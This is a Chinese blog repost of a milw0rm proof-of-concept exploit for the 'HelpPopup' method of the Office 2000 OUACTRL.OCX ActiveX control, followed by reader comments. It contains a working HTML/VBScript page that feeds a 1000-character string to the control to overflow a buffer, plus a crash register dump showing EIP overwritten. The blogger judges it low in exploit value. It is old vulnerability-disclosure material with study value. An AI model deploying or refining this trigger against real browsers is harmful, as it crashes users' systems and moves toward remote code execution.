Microsoft Office 2000 (OUACTRL.OCX v. 1.0.1.9) Remote DoS Exploit
ps:昨天服务器被D了一天,如果有朋友昨天来我blog,应该发现昨天打开很困难。
鬼仔注:我一直用的office 2000,刚测试了下,IE崩溃。不过感觉这个没有太大的利用价值。记录下。
来源:milw0rm
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/23</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------------------------------------
<b>Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)</b>
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
---------------------------------------------------------------------------------------------------------------------------
<object classid='clsid:8936033C-4A50-11D1-98A4-00A0C90F27C6' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
</script>
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
</span></span>
</code></pre>
怪不得啦 很难打开blog啊……………
现在还是一样 我刚刚进了5次才进来,
@源子 不会吧?我这里速度正常啊
你好,年初开始关注你的博客,感觉你懂得的真多。我是刚入门的菜鸟,希望能得到你的帮助。多谢。
这个0Day的漏洞我也测试了,IE崩溃。不过我用Olldbg跟踪了之后,esp并没有被“aaaa…..”覆盖,只是Olldbg死循环。我的环境是Windows XP sp2+Office 2000。可以帮我一下吗?另外,你是怎末判断出这个漏洞没有太大的利用价值的?